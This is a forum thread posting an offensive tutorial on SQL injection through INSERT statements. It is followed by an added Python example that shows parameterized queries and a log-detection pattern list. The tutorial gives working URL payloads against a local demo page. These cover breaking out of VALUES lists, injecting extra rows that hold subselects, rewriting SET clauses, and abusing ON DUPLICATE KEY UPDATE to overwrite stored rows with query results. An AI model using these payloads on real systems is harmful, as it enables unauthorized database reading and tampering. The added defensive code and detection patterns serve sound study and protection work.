
Thread: INSERT Statement SQL Injection - Advanced - Tutorial

  1. #1

    INSERT Statement Sql Injection - Advanced - Tutorial

    Hello everyone,

    My friend, Cyde, and I have been looking at a public source for a few days now, and we found a lot of vulnerabilities related to SQL Injection where most of the statements were INSERT statements and not the usual SELECT. Now I know that most people think that these kinds of injections are difficult and hard to deal with, and that's why in this tutorial I'll be explaining how to inject various INSERT statements, which will hold a few tips and tricks.

    Our Goal
    Before we keep talking about this, I think you must know that the goal of these injections is to inject a SELECT statement within the INSERT statement, which will then force the database to insert the results of our SELECT statement and, as you'll see later, these inserted values will show up on a webpage, which means that whatever we were after will be there for us to look at, lol.
    All of this tutorial is obviously easier if you know the original INSERT statement, because it's required for proper manipulation.

    The information
    1. Database/Table


    What matters the most in this table is that the column 'id' is unique and auto-increments, which means that each comment has its own id and no other comment can have the same one. Also, you don't have to provide an id value when inserting data in this table, because the id column will be filled automatically: the first comment will have id=1, the second comment will have id=2, etc. But keep in mind that you can give an id to a comment if you want to. Everything I just mentioned is really important, and you'll see why soon.
    2. Insert script: 127.0.0.1/insert.php

    It supports two GET variables only, 'videoid' and 'comment'. The username is automatically set to 'dotcppfile' and the 'id', just like we said before, gets an automatic value. So all we need is something like this request: 127.0.0.1/insert.php?videoid=123456&comment=interesting to insert a proper comment.
    3. The comments that we insert show up at: 127.0.0.1/comments.php


    4. Our insert page's source: pastebin.com/58w0h2Nw

    Various Interesting Types of INSERT Statements
    1. Type 1: INSERT INTO comments (`comment`, `username`, `videoid`) VALUES ('interesting', 'dotcppfile', '123456')
    2. Type 2: INSERT INTO comments SET comment = 'interesting', username = 'dotcppfile', videoid = '123456'

    There's INSERT SELECT, INSERT DELAYED and many others but these can be injected in the same way so it's not that interesting. Anyways, we will be exploiting both of these types in 2 ways based on which variable is vulnerable.

    Type 1 - First
    So, we have the following insert statement:
    INSERT INTO comments (`comment`, `username`, `videoid`) VALUES ('interesting', 'dotcppfile', '123456')
    In this case, the GET variable 'comment' in 'insert.php' is vulnerable. If we want to inject a proper SELECT statement into this, we should go for:
    127.0.0.1/insert.php?videoid=123456&comment=interesting ', (select version()), '123456')--+
    Our original INSERT statement will become:
    INSERT INTO comments (`comment`, `username`, `videoid`) VALUES ('interesting', (select version()), '123456')--+', 'dotcppfile', '123456')
    Now everything after --+ will be commented out, and what gets inserted in the database is what we asked for, which is a comment that holds "interesting" and is posted by 'select version()'. That will be the output on 'comments.php':

    As you can see, the username is the value of our inserted SELECT statement, as simple as that.

    Now this part here is something you've seen out there, but what comes next should be original so keep reading.

    Type 1 - Second
    We have the same INSERT Statement:
    INSERT INTO comments (`comment`, `username`, `videoid`) VALUES ('interesting', 'dotcppfile', '123456')
    But this time, the GET variable 'videoid' is vulnerable in 'insert.php'.
    Now, in this case, we have a huge difference. What I'm trying to say is that what we used in the last part won't work, because we cannot edit the username, the comment or the videoid, since they come before our injection. But, fortunately, in an INSERT statement you can insert multiple rows at a time using something like this:
    INSERT INTO comments (`comment`, `username`, `videoid`) VALUES ('first comment', 'dotcppfile', '123456'), ('second comment', 'dotcppfile', '123456')
    We are going to use this right now to get things working, so here's how our link will look:
    127.0.0.1/insert.php?comment=interesting&videoid=123456 '), ('second comment', (select version()), '123456')--+
    Our INSERT statement will become:
    INSERT INTO comments (`comment`, `username`, `videoid`) VALUES ('first comment', 'dotcppfile', '123456'), ('second comment', (select version()), '123456')--+')
    And the output on 'comments.php' will be:

    So two comments were inserted and the second one was holding the result of our SELECT Statement.

    As you can see, we can always do something no matter what. Now let's move to Type 2.

    Type 2 - First
    Our INSERT statement is the following: INSERT INTO comments SET comment = 'interesting', username = 'dotcppfile', videoid = '123456'
    In 'insert.php' the GET variable 'comment' is vulnerable, so to inject this properly we will need the following URL:
    127.0.0.1/insert.php?videoid=123456&comment=interesting ', username=(select version()), videoid='123456'--+
    The INSERT statement will become:
    INSERT INTO comments SET comment = 'interesting', username=(select version()), videoid='123456'--+', username = 'dotcppfile', videoid = '123456'

    And that's pretty much it.

    Type 2 - Second
    Now this is what matters the most in this Tutorial.
    In this part we will be using an INSERT Statement with an UPDATE Statement to get things up and running properly.
    So again, our INSERT Statement is:
    INSERT INTO comments SET comment = 'interesting', username = 'dotcppfile', videoid = '123456'
    But this time, in 'insert.php', the vulnerable GET variable is 'videoid', and it won't be easy if we want to SQL inject, because 'videoid' is at the end of our INSERT statement and we can't do what we did in 'Type 1 - Second', because this type doesn't work that way. But again, there's always a way:
    If you remember, I mentioned first that the table holds a column called 'id' that is unique and auto-increments, so every comment has its own id, which is something we can use in our favor here. Now, what we know is that the INSERT statement doesn't fill the 'id' column, since it gets filled automatically, but we can fill it up ourselves, and you'll soon see why we want to. So, let's create a normal comment and give it our own id.
    Warning: we have to make sure that the 'id' we're giving is unique, or else we will get a 'mysql error'.

    Let's go for the following URL:
    127.0.0.1/insert.php?comment=interesting&videoid=123456 ', id=2147483640--+
    The INSERT statement will become:
    INSERT INTO comments SET comment = 'interesting', username = 'dotcppfile', videoid = '123456', id=2147483640--+'
    And if we check the 'comments.php' page:

    Normal right? Obviously, but if we take a look at Data in the Table:

    As you can see, our own 'id' was inserted, but, what's the point?
    What we are trying to do here is to use the INSERT ... ON DUPLICATE KEY UPDATE statement: dev.mysql.com/doc/refman/5.0/en/insert-on-duplicate.html
    What this statement will do is update the data in the Table with new data that was appended with the new insert statement IF the new data has the same ID as the main one. Read this again, it's what this whole part is about.
    Example:
    If we have the following data in the table:
    id         | videoid | username   | comment
    2147483640 | 123456  | dotcppfile | interesting
    And we try to insert the following using the INSERT ... ON DUPLICATE KEY UPDATE statement with 'comment':
    2147483640 | 123456  | dotcppfile | second comment
    It won't be inserted, but the main data will be updated and it will become:
    2147483640 | 123456  | dotcppfile | second comment

    Now we are going to use this, and our URL will be:
    127.0.0.1/insert.php?comment=interesting&videoid=123456 ', id=2147483640 ON DUPLICATE KEY UPDATE comment=(select version())--+
    And our INSERT Statement will be:
    INSERT INTO comments SET comment = 'interesting', username = 'dotcppfile', videoid = '123456', id=2147483640 ON DUPLICATE KEY UPDATE comment=(select version())--+
    And the new output on our 'comments.php' will be:

    So we updated the old comment with the new comment.

    As simple as that.

    Now, as you can see, INSERT statements can be manipulated; we just have to be smart about it and do it right. We handled them in 4 ways in this tutorial, and as far as I know this is mostly everything out there.

    I hope you learned something new,
    that's all for today,
    dotcppfile.
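The following is an added example from the editor, not code from the thread or from dotcppfile's insert.php. It rebuilds the tutorial's comments table in Python's bundled sqlite3 instead of PHP/MySQL, so `sqlite_version()` stands in for `version()` and the decoded `-- ` stands in for `--+` (MySQL's `INSERT ... SET` and `ON DUPLICATE KEY UPDATE` are not SQLite syntax, so only the Type 1 multi-row payload is replayed against the table). It shows the string-built INSERT storing two rows from the "Type 1 - Second" payload, the same INSERT with bound parameters storing the payload as an ordinary string, and a log check that flags the payload shapes used in the tutorial in query strings. The schema, the log lines and the 10.0.0.x addresses are constructed for the example.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Constructed schema mirroring the tutorial's comments table: id is the
# auto-increment primary key and the username is fixed server-side.
SCHEMA = """
CREATE TABLE comments (
    id       INTEGER PRIMARY KEY AUTOINCREMENT,
    videoid  TEXT NOT NULL,
    username TEXT NOT NULL,
    comment  TEXT NOT NULL
)
"""

SQLITE_VERSION = sqlite3.sqlite_version  # value that sqlite_version() returns

def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    return conn

def insert_vulnerable(conn, videoid, comment):
    # String-built INSERT: the shape the tutorial's "Type 1 - Second" case
    # exploits, with the attacker-controlled videoid last in the VALUES list.
    sql = ("INSERT INTO comments (comment, username, videoid) "
           f"VALUES ('{comment}', 'dotcppfile', '{videoid}')")
    conn.execute(sql)

def insert_parameterized(conn, videoid, comment):
    # Same INSERT with bound parameters: the driver keeps the values apart
    # from the statement text, so quotes, commas and comment markers in the
    # input are stored as data and never parsed as SQL.
    conn.execute(
        "INSERT INTO comments (comment, username, videoid) VALUES (?, 'dotcppfile', ?)",
        (comment, videoid),
    )

# The tutorial's multi-row payload after URL decoding (sqlite_version() in
# place of MySQL's version(); "-- " is what "--+" decodes to).
MULTI_ROW_PAYLOAD = "123456'), ('second comment', (select sqlite_version()), '123456')-- "

def rows_after_insert(handler, videoid, comment="interesting"):
    """Run one handler against a fresh table and return what it stored."""
    conn = fresh_db()
    handler(conn, videoid, comment)
    return conn.execute(
        "SELECT username, videoid, comment FROM comments ORDER BY id").fetchall()

# Indicators for the payload shapes shown in the tutorial, applied to each
# decoded query-string value of a request.
INSERT_INJECTION_PATTERNS = [
    ("multi_row_values", re.compile(r"'\s*\)\s*,\s*\(")),        # close a VALUES row, open another
    ("on_duplicate_key_update", re.compile(r"on\s+duplicate\s+key\s+update", re.I)),
    ("subselect", re.compile(r"\(\s*select\b", re.I)),           # subquery in a value position
    ("comment_truncation", re.compile(r"--(\s|$)")),             # MySQL comment cutting off the rest
]

def flag_request(log_line):
    """Return (parameter, indicator) pairs for one access-log line in the
    constructed format used by SAMPLE_LOG below."""
    m = re.search(r'"GET (\S+) HTTP/', log_line)
    if not m:
        return []
    hits = []
    # parse_qs percent-decodes and turns "+" into a space, as the server would.
    for param, values in parse_qs(urlsplit(m.group(1)).query).items():
        for value in values:
            for name, pattern in INSERT_INJECTION_PATTERNS:
                if pattern.search(value):
                    hits.append((param, name))
    return hits

# Constructed log lines: one benign request, then the tutorial's
# "Type 1 - Second" and "Type 2 - Second" payloads as a client would send them.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2014:10:00:00 +0000] "GET /insert.php?videoid=123456&comment=interesting HTTP/1.1" 200',
    '10.0.0.9 - - [01/Jan/2014:10:00:07 +0000] "GET /insert.php?comment=interesting&videoid=123456%27),%20(%27second%20comment%27,%20(select%20version()),%20%27123456%27)--+ HTTP/1.1" 200',
    '10.0.0.9 - - [01/Jan/2014:10:00:30 +0000] "GET /insert.php?comment=interesting&videoid=123456%27,%20id=2147483640%20ON%20DUPLICATE%20KEY%20UPDATE%20comment=(select%20version())--+ HTTP/1.1" 200',
]

if __name__ == "__main__":
    print("vulnerable   :", rows_after_insert(insert_vulnerable, MULTI_ROW_PAYLOAD))
    print("parameterized:", rows_after_insert(insert_parameterized, MULTI_ROW_PAYLOAD))
    for line in SAMPLE_LOG:
        print(flag_request(line) or "clean", "<-", line.split('"')[1])
```

With the string-built handler the payload yields two rows, the second carrying the database version in the username column, exactly the outcome the tutorial describes; with bound parameters the whole payload lands in the videoid column of a single row and nothing else is executed, which is why parameterization covers all four cases in the tutorial at once. The log check is a coarse indicator set rather than a full detector: it is meant to be run over request logs of endpoints that write to the database, and hits on the `on_duplicate_key_update` or `multi_row_values` shapes in particular are worth a look because they rarely occur in legitimate parameter values.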

  2. #2
    thanks for sharing your article with insert sql statements :-)

  3. #3
    Quote Originally Posted by nullbyte View Post
    thanks for sharing your article with insert sql statements :-)
    Great you liked it, thanks for posting.
